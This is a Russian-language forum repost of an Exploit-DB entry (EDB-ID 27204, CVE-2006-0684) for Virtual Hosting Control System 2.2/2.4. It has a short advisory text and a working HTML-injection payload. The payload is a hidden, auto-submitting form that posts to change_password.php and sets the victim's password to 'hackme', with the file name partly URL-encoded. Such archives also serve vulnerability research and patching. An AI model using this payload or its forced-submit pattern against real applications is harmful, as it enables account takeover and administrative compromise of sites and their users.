Exploit Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
27204
Проверка EDB
  1. Пройдено
Автор
ROMAN MEDINA-HEIGL HERNANDEZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-0684
Дата публикации
2006-02-13
HTML:
source: https://www.securityfocus.com/bid/16600/info

Virtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities.

VHCS is prone to an HTML-injection vulnerability and an authentication-bypass vulnerability. These issues could be exploited to gain administrative access to the application; other attacks are also possible.

</form><form name="dsr" method="post" action="ch%61nge_password.php"><input name="pass" value="hackme"><input name="pass_rep" value="hackme"><input name="uaction" value="updt_pass"></form><script>document.dsr.submit()</script>
 
Источник
www.exploit-db.com

Похожие темы